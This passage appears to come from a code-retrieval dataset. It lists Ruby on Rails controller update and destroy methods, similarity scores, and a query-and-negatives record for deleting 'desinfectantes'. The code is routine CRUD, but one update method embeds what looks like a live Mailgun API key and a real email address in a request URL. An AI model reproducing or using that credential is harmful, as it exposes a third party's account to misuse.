"def update\n @consumo = Consumo.find(params[:id])\n\n respond_to do |format|\n if @consumo.update_attributes(params[:consumo])\n format.html { redirect_to @consumo.cliente, :notice => 'Consumo alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @consumo.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @asiento_de_servicio.update(asiento_de_servicio_params)\n format.html { redirect_to @asiento_de_servicio, notice: 'Asiento de servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @asiento_de_servicio }\n else\n format.html { render :edit }\n format.json { render json: @asiento_de_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @clientes_servico.update(clientes_servico_params)\n format.html { redirect_to @clientes_servico, notice: 'Clientes servico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @clientes_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @os_entregavel.update(os_entregavel_params)\n if @os_entregavel.ordem_servico.id!=nil\n format.html { redirect_to \"/ordem_servicos/\"+@os_entregavel.ordem_servico.id.to_s, notice: 'Os entregavel foi atualizado(a)' }\n format.json { head :no_content }\n else\n format.html { redirect_to @os_entregavel, notice: 'Os entregavel foi atualizado(a)' }\n format.json { render :show, status: :ok, location: @os_entregavel }\n end\n else\n format.html { render :edit }\n format.json { render json: @os_entregavel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @repuesto_servicio.update(repuesto_servicio_params)\n format.html { redirect_to @repuesto_servicio, notice: 'Repuesto o servicio fue actualizado con éxito.' }\n format.json { render :show, status: :ok, location: @repuesto_servicio }\n else\n format.html { render :edit }\n format.json { render json: @repuesto_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @sugerencia = Sugerencia.find(params[:id])\n\n respond_to do |format|\n if @sugerencia.update_attributes(params[:sugerencia])\n format.html { redirect_to @sugerencia, :notice => 'Sugerencia was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @sugerencia.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(cliente_params)\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @desafio.update(desafio_params)\n format.html { redirect_to @desafio, notice: 'Desafio was successfully updated.' }\n format.json { render :show, status: :ok, location: @desafio }\n else\n format.html { render :edit }\n format.json { render json: @desafio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @endereco = Endereco.find(params[:id])\n\n respond_to do |format|\n if @endereco.update_attributes(params[:endereco])\n format.html { redirect_to \"/dados\", notice: 'O endereço foi alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @endereco.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n if @depoevento.update_attributes(params[:depoevento])\n format.html { redirect_to @depoevento, notice: 'Depoevento was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @depoevento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n if @lista_contato.update_attributes(params[:lista_contato])\n format.html { redirect_to @lista_contato, notice: 'Lista contato was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @lista_contato.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contador.update(contador_params)\n format.html { redirect_to @contador, notice: 'Contador was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @contador.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n if @tecnico.update_attributes(params[:tecnico])\n format.html { redirect_to @tecnico, notice: 'Tecnico atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @tecnico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @clientepedido = Clientepedido.find(params[:id])\n\n respond_to do |format|\n if @clientepedido.update_attributes(params[:clientepedido])\n format.html { redirect_to @clientepedido, notice: 'EL pedido fue actualizado.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @clientepedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @inicio.update(inicio_params)\n format.html { redirect_to @inicio, notice: 'Inicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @inicio }\n else\n format.html { render :edit }\n format.json { render json: @inicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @serie_detalle.update(serie_detalle_params)\n format.html { redirect_to @serie_detalle, notice: 'Serie detalle was successfully updated.' }\n format.json { render :show, status: :ok, location: @serie_detalle }\n else\n format.html { render :edit }\n format.json { render json: @serie_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n if @espacio_deportivo.update_attributes(params[:espacio_deportivo])\n format.html { redirect_to root_url, :notice => \"Se actualizo correctamente el espacio deportivo\" }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @espacio_deportivo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:producto][:activo]\n id = params[:id]\n Producto.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n respond_to do |format|\n if @tb_servicio.update(tb_servicio_params)\n format.html { redirect_to @tb_servicio, notice: 'Tb servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @tb_servicio }\n else\n format.html { render :edit }\n format.json { render json: @tb_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @dossier = Dossier.find(params[:id])\n \n respond_to do |format|\n if @dossier.update_attributes(params[:dossier])\n format.html { redirect_to(@dossier, :notice => 'Dossier was successfully updated.') }\n format.xml { head :ok }\n format.json { render :json => { :success => true, :message => \"Updated Dossier #{@dossier.id}\", :data => @dossier.attributes.merge(:institution_nom => @dossier.institution.nom, :type_etat_dossier_description => @dossier.type_etat_dossier.try(:description), :juge_mission_id => @dossier.juge_mission.try(:contact_id), :juge_controlleur_id => @dossier.juge_controlleur.try(:contact_id))}}\n \n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @dossier.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tipoapreensao.update(tipoapreensao_params)\n format.html { redirect_to @tipoapreensao, notice: 'Tipoapreensao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @tipoapreensao.errors, status: :unprocessable_entity }\n end\n end\n end",
"def api_patch(path, data = {})\n api_request(:patch, path, :data => data)\n end",
"def update\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n\n respond_to do |format|\n if @faixa_de_desconto.update_attributes(params[:faixa_de_desconto])\n flash[:notice] = 'FaixaDeDesconto was successfully updated.'\n format.html { redirect_to(@faixa_de_desconto) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @faixa_de_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @telefone_cliente.update(telefone_cliente_params)\n format.html { redirect_to @telefone_cliente, notice: 'Telefone cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @telefone_cliente }\n else\n format.html { render :edit }\n format.json { render json: @telefone_cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contatos_cliente.update(contatos_cliente_params)\n format.html { redirect_to @contatos_cliente, notice: 'Contatos cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @contatos_cliente }\n else\n format.html { render :edit }\n format.json { render json: @contatos_cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @asiento = Asiento.find(params[:id])\n\n respond_to do |format|\n if @asiento.update_attributes(params[:asiento])\n format.html { redirect_to @asiento, :notice => 'El apunte fue cambiado.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @asiento.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @sitio_entrega = SitioEntrega.find(params[:id])\n\n respond_to do |format|\n if @sitio_entrega.update_attributes(params[:sitio_entrega])\n format.html { redirect_to @sitio_entrega, notice: 'Sitio entrega was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @sitio_entrega.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @entrega.update(entrega_params)\n format.html { redirect_to @entrega, notice: 'Entrega editada con éxito.' }\n format.json { render :show, status: :ok, location: @entrega }\n else\n format.html { render :edit }\n format.json { render json: @entrega.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:presentacion][:activo]\n id = params[:id]\n Presentacion.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n respond_to do |format|\n if @solicitud.update(solicitud_params)\n format.html { redirect_to @solicitud, notice: 'Solicitud was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitud.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @informacioncomercial.update(informacioncomercial_params)\n format.html { redirect_to @informacioncomercial, notice: 'Informacioncomercial was successfully updated.' }\n format.json { render :show, status: :ok, location: @informacioncomercial }\n else\n format.html { render :edit }\n format.json { render json: @informacioncomercial.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @objet = Objet.find(params[:id])\n\n respond_to do |format|\n if @objet.update_attributes(params[:objet])\n format.html { redirect_to @objet, notice: 'The found item was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @objet.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n set_funcionario\n if @ordem_servico.update(ordem_servico_params)\n format.html { redirect_to @ordem_servico, notice: t('messages.cadastro_atualizado') }\n format.json { render :show, status: :ok, location: @ordem_servico }\n else\n format.html { render :edit }\n format.json { render json: @ordem_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @compra_venta_normal.update(compra_venta_normal_params)\n format.html { redirect_to @compra_venta_normal, notice: 'Compra venta normal was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @compra_venta_normal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n if @cliente.update_attributes(params[:cliente])\n format.html { redirect_to @cliente, notice: 'Cliente atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tiposveiculo.update(tiposveiculo_params)\n format.html { redirect_to tiposveiculos_url, notice: 'Tipo de Veículo editado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render :edit }\n format.json { render json: @tiposveiculo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if params[:elefe][:prix]\n params[:elefe][:info_ville] = params[:elefe][:info_ville].join(',') if params[:elefe][:info_ville] != nil\n params[:elefe][:prix] = @tarif[params[:elefe][:parentee].to_i] if params[:elefe][:parentee] != nil\n params[:elefe][:signature] = false\n cour = Cour.find_by(:id => params[:elefe][:ville_entrainement])\n cours = @elefe.cours\n if !cours.detect { |b| b.id == cour.id }\n @elefe.cours << cour\n end\n @elefe.commandes.first.update(montant: params[:elefe][:prix])\n @elefe.update_attributes(:updated_at => Time.now)\n end\n respond_to do |format|\n if @elefe.update(elefe_params)\n format.html { redirect_to @elefe, notice: 'La fiche élève a bien été modifiée.' }\n format.json { render :show, status: :ok, location: @elefe }\n else\n format.html { render :edit }\n format.json { render json: @elefe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n if @cliente.update_attributes(params[:cliente])\n format.html { render :json => {:success => true} }\n format.xml { render :xml => @cliente, :status => :created, :location => @cliente }\n else\n format.html { render :json => ( (@cliente.errors.full_messages.join(\".<br />\").to_s + \".\").to_json ) } unless @cliente.errors.empty?\n end\n end\n end",
"def update\n respond_to do |format|\n if @registro_servicio.update(registro_servicio_params)\n format.html { redirect_to @registro_servicio, notice: 'Servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @registro_servicio }\n else\n format.html { render :edit }\n format.json { render json: @registro_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update \n retorno = {erro: \"322\" ,body: \"\"}\n if @usuario.update(valid_request?)\n retorno = {erro: \"000\", body: {evento_id: @usuario.id, usuario_nome: @usuario.nome}}\n end\n render json: retorno.to_json\n end",
"def update\n @consulta = Consulta.find(params[:id])\n\n if @consulta.update(params[:consulta])\n head :no_content\n else\n render json: @consulta.errors, status: :unprocessable_entity\n end\n end",
"def update\n @productos = Car.where(:pedidoID => params[:id])\n respond_to do |format| \n if @pedido.update(pedido_params)\n \n format.html { redirect_to \"/\", notice: 'Pedido was successfully updated.' }\n format.json { render :show, status: :ok, location: @pedido }\n RestClient.post \"https://api:key-e7d79c66e74391fdf48b657624f23ddc\"\\\n \"@api.mailgun.net/v3/sandboxb9c2dadab0ea49f6b7130d1091646c59.mailgun.org/messages\",\n :from => \"Sistema de Pedidos <mailgun@sandboxb9c2dadab0ea49f6b7130d1091646c59.mailgun.org>\",\n #:to => \"proteina@sinergroup.com.mx\",\n :to => \"proteina@sinergroup.com.mx\",\n :subject => \"Solicitud de Pedido\",\n :html => (render_to_string(template: \"../views/pedidos/email\")).to_str\n else\n format.html { render :edit }\n format.json { render json: @pedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @conta.update(conta_params)\n format.html { redirect_to contas_path, notice: @@titulo + t('msg.update') }\n format.json { render :show, status: :ok, location: @conta }\n else\n format.html { render :edit }\n format.json { render json: @conta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @nombr_comune.update(nombr_comune_params)\n format.html { redirect_to @nombr_comune, notice: 'Nombre comun was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @nombr_comune.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @selecao = Selecao.find(params[:id])\n\n respond_to do |format|\n if @selecao.update_attributes(params[:selecao])\n format.html { redirect_to @selecao, notice: 'Selecao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @selecao.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n #parametros_autocomplete!(params[:estudiante][:persona])\n @estudiante = Estudiante.find(params[:id])\n \n begin\n @estudiante.persona_id = params[:persona][:id]\n rescue\n end\n\n respond_to do |format|\n if @estudiante.update_attributes(params[:estudiante])\n format.html { redirect_to @estudiante, notice: 'Estudiante actualizado' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @estudiante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @prueba_json.update(prueba_json_params)\n format.html { redirect_to @prueba_json, notice: 'Prueba json was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @prueba_json.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n if @tecnico.update_attributes(params[:tecnico])\n format.html { redirect_to @tecnico, :notice => 'Tecnico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @tecnico.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @ejercicio = Ejercicio.find(params[:id])\n\n respond_to do |format|\n if @ejercicio.update_attributes(params[:ejercicio])\n format.html { redirect_to @ejercicio, notice: 'Ejercicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @ejercicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @diretor = Diretor.order('nome')\n @ator = Ator.order('nome')\n\n respond_to do |format|\n if @filme.update_attributes(filme_params)\n format.html { redirect_to @filme, notice: 'O filme foi atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @filme.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n if @descuento.update_attributes(params[:descuento])\n format.html { redirect_to @descuento, notice: 'Descuento was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @cliente.update(cliente_params)\n format.html { redirect_to @cliente, notice: 'Cliente atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @oficio.update(oficio_params)\n format.html { redirect_to oficios_url, notice: 'Oficio actualizado exitosamente.' }\n format.json { render :show, status: :ok, location: oficios_url }\n else\n format.html { render :edit }\n format.json { render json: @oficio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objet.update(objet_params)\n format.html { redirect_to @objet, notice: 'Objet was successfully updated.' }\n format.json { render :show, status: :ok, location: @objet }\n else\n format.html { render :edit }\n format.json { render json: @objet.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalle_documento_de_compra.update(detalle_documento_de_compra_params)\n format.html { redirect_to @detalle_documento_de_compra, notice: 'Detalle documento de compra was successfully updated.' }\n format.json { render :show, status: :ok, location: @detalle_documento_de_compra }\n else\n format.html { render :edit }\n format.json { render json: @detalle_documento_de_compra.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitacao_tipo.update(solicitacao_tipo_params)\n format.html { redirect_to @solicitacao_tipo, notice: 'Solicitacao tipo was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitacao_tipo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @consulta_viaje.update(consulta_viaje_params)\n format.html { redirect_to @consulta_viaje, notice: 'Consulta viaje was successfully updated.' }\n format.json { render :show, status: :ok, location: @consulta_viaje }\n else\n format.html { render :edit }\n format.json { render json: @consulta_viaje.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n pai = params[:pai] ? Conta.find_by_id(params[:pai]): nil\n \n respond_to do |format|\n if @conta.update(nome: conta_params[:nome], status: conta_params[:status], pai: pai) \n #format.json { render :show, status: :ok, location: @conta }\n format.json { render json: @conta.to_json, status: :ok }\n else \n format.json { render json: @conta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\n @empresa_servicio = EmpresaServicio.find(params[:id])\n respond_to do |format|\n if @empresa_servicio.update_attributes(params[:empresa_servicio])\n\n format.html { redirect_to empresa_empresa_servicios_path, notice: \"Los datos del servicio fueron actualizados para la empresa #{@empresa_servicio.empresa.nombre_empresa}\"}\n \n else\n format.html { render action: \"edit\" }\n format.json { render json: @empresa_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tipo_negocio = TipoNegocio.find(params[:id])\n\n respond_to do |format|\n if @tipo_negocio.update_attributes(params[:tipo_negocio])\n format.html { redirect_to @tipo_negocio, notice: 'Tipo negocio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @tipo_negocio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @datos_estudiante.update(datos_estudiante_params)\n format.html { redirect_to @datos_estudiante, notice: 'Datos estudiante was successfully updated.' }\n format.json { render :show, status: :ok, location: @datos_estudiante }\n else\n format.html { render :edit }\n format.json { render json: @datos_estudiante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objetivo.update(objetivo_params)\n format.html { redirect_to [@mision, @objetivo], notice: 'Objetivo was successfully updated.' }\n format.json { render :show, status: :ok, location: [@mision, @objetivo] }\n else\n format.html { render :edit }\n format.json { render json: [@mision, @objetivo].errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contato.update(contato_params)\n format.html { redirect_to @contato, flash: { success: 'Contato was successfully updated.' } }\n format.json { render :show, status: :ok, location: @contato }\n else\n format.html { render :edit }\n format.json { render json: @contato.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitacoes_avaliacoes_servico.update(solicitacoes_avaliacoes_servico_params)\n format.html { redirect_to @solicitacoes_avaliacoes_servico, notice: 'Solicitacoes avaliacoes servico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitacoes_avaliacoes_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @recurso = Recurso.find(params[:id])\n\n respond_to do |format|\n if @recurso.update_attributes(params[:recurso])\n format.html { redirect_to @recurso, notice: 'O recurso de auto de infração foi atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @recurso.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitante.update(solicitante_params)\n format.html { redirect_to @solicitante, notice: 'Solicitante was successfully updated.' }\n format.json { render :show, status: :ok, location: @solicitante }\n else\n format.html { render :edit }\n format.json { render json: @solicitante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch(path, data)\n request 'PATCH', path, body: data.to_json\n end",
"def rest_edit(path, options={}, &blk)\n callback = Proc.new { |*args|\n @object = yield(*args) or pass\n rest_params.each { |k, v| @object.send :\"#{k}=\", v unless k == 'id' }\n\n return 400, @object.errors.to_json unless @object.valid?\n\n @object.save\n rest_respond @object\n }\n\n # Make it work with `Backbone.emulateHTTP` on.\n put path, &callback\n post path, &callback\n end",
"def rest_edit(path, options={}, &blk)\n callback = Proc.new { |*args|\n @object = yield(*args) or pass\n rest_params.each { |k, v| @object.send :\"#{k}=\", v unless k == 'id' }\n\n return 400, @object.errors.to_json unless @object.valid?\n\n @object.save\n rest_respond @object\n }\n\n # Make it work with `Backbone.emulateHTTP` on.\n put path, &callback\n post path, &callback\n end",
"def update\n respond_to do |format|\n if @telefono.update(telefono_params)\n format.html { redirect_to @telefono, notice: 'Telefono was successfully updated.' }\n format.json { render :show, status: :ok, location: @telefono }\n else\n format.html { render :edit }\n format.json { render json: @telefono.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @informacao.update(informacao_params)\n format.html { redirect_to @informacao, notice: 'Informacao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @informacao.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.6500287",
"0.6442837",
"0.64224625",
"0.63979876",
"0.6375225",
"0.63302875",
"0.6328817",
"0.6291803",
"0.62866145",
"0.6285924",
"0.62819654",
"0.6257505",
"0.6249846",
"0.6248789",
"0.62433636",
"0.62423736",
"0.6232456",
"0.62319374",
"0.62314755",
"0.6229124",
"0.6226332",
"0.62218",
"0.620393",
"0.61964107",
"0.6184693",
"0.61767244",
"0.61711985",
"0.6170389",
"0.616861",
"0.6159405",
"0.61550206",
"0.61500376",
"0.6143508",
"0.61402595",
"0.6137728",
"0.61361307",
"0.61332726",
"0.6132605",
"0.61285025",
"0.6121173",
"0.61195344",
"0.6117962",
"0.6115188",
"0.6113792",
"0.6113208",
"0.6111886",
"0.611059",
"0.6107253",
"0.6104095",
"0.61036676",
"0.6102444",
"0.60966426",
"0.60956466",
"0.6091356",
"0.6091166",
"0.60900724",
"0.6087772",
"0.6086336",
"0.6085748",
"0.6084032",
"0.6083048",
"0.6081596",
"0.6080739",
"0.60803163",
"0.60797787",
"0.6079679",
"0.6078172",
"0.60770106",
"0.60741025",
"0.6072443",
"0.60716283",
"0.6068664",
"0.6067449",
"0.6067421",
"0.6063459",
"0.60624135",
"0.6061612",
"0.6060432",
"0.60569465",
"0.6053316",
"0.60533106",
"0.60524726",
"0.60456043",
"0.60453826",
"0.6044554",
"0.604255",
"0.6038994",
"0.6036832",
"0.6028904",
"0.6028694",
"0.6026297",
"0.60251683",
"0.60215473",
"0.6021547",
"0.6021065",
"0.60207933",
"0.6018826",
"0.6018826",
"0.60181904",
"0.6017167"
] |
0.6531241
|
0
|
DELETE /desinfectantes/1 DELETE /desinfectantes/1.json
|
def destroy
@desinfectante.destroy
respond_to do |format|
format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }
format.json { head :no_content }
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @asignatura.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def delete\n client.delete(\"/#{id}\")\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def delete\n render :json => @fiestas.delete_at(params[:id].to_i)\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @visitante.destroy\n respond_to do |format|\n format.html { redirect_to visitantes_url, notice: 'Visitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_insumos_reactivo.destroy\n respond_to do |format|\n format.html { redirect_to datos_insumos_reactivos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_estudiante.destroy\n respond_to do |format|\n format.html { redirect_to datos_estudiantes_url, notice: 'Datos estudiante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuesta = Respuesta.find(params[:id])\n @respuesta.destroy\n\n respond_to do |format|\n format.html { redirect_to respuestas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @unidad.destroy\n respond_to do |format|\n format.html { redirect_to unidades_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @donante.destroy\n respond_to do |format|\n format.html { redirect_to donantes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicitudes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @dato = Dato.find(params[:id])\n @dato.destroy\n\n respond_to do |format|\n format.html { redirect_to datos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datosgenerale.destroy\n respond_to do |format|\n format.html { redirect_to datosgenerales_url }\n format.json { head :no_content }\n end\n end",
"def delete path\n make_request(path, \"delete\", {})\n end",
"def destroy\n @humanidades1 = Humanidades1.find(params[:id])\n @humanidades1.destroy\n\n respond_to do |format|\n format.html { redirect_to humanidades1s_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @servicio = Servicio.find(params[:id])\n @servicio.destroy\n\n respond_to do |format|\n format.html { redirect_to servicios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cantante.destroy\n respond_to do |format|\n format.html { redirect_to cantantes_url, notice: 'Cantante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cargo_eleicao = CargoEleicao.find(params[:id])\n @cargo_eleicao.destroy\n\n respond_to do |format|\n format.html { redirect_to cargo_eleicaos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fulcliente = Fulcliente.find(params[:id])\n @fulcliente.destroy\n\n respond_to do |format|\n format.html { redirect_to fulclientes_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @contador.destroy\n respond_to do |format|\n format.html { redirect_to contadors_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_documento_de_compra.destroy\n respond_to do |format|\n format.html { redirect_to :back, notice: 'Linea eliminada' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @conta.destroy\n params[:id] = nil\n respond_to do |format|\n format.html { redirect_to contas_path, notice: @@titulo + t('msg.remove') }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asignatura = Asignatura.find(params[:id])\n @asignatura.destroy\n\n respond_to do |format|\n format.html { redirect_to asignaturas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asignatura = Asignatura.find(params[:id])\n @asignatura.destroy\n\n respond_to do |format|\n format.html { redirect_to asignaturas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @indicativo = Indicativo.find(params[:id])\n @indicativo.destroy\n\n respond_to do |format|\n format.html { redirect_to indicativos_url }\n format.json { head :no_content }\n end\n end",
